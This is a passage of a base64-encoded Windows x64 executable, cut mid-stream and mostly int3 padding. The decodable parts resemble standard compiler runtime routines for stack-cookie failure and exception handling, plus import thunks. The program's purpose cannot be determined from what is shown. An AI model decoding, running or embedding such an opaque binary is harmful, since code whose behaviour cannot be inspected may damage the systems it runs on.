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MzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMZmYPH4QAAAAAAP/gzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMQFVIg+wgSIvqD7ZNIOgqnv//kEiDxCBdw8zMzMzMzMxAVUiD7CBIi+roOp///5APtk0g6ASe//+QSIPEIF3DzMzMzMzMzMzMzMzMzMzMzMxAVUiD7DBIi+pIiU04SItFOEiLAIsAiUU0SItFOItNNEiJRCQoiUwkIEyNDXCl//9Mi0Vgi1VYSItNUOhun///kEiDxDBdw8zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMxAVUiD7CBIi+pIiU1ISItFSEiLAIsAiUUki0UkPQUAAMB1CcdFIAEAAADrB8dFIAAAAACLRSBIg8QgXcPMzMzMzMzMzMzMzMzMzMzMzMzMzEBVSIPsIEiL6kiLATPJgTiIE21AD5TBi8FIg8QgXcPMzMzMzMzMzMzMzMzMzMzMzEBVSIPsIEiL6kiLATPJgTiIE21AD5TBi8FIg8QgXcPMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMz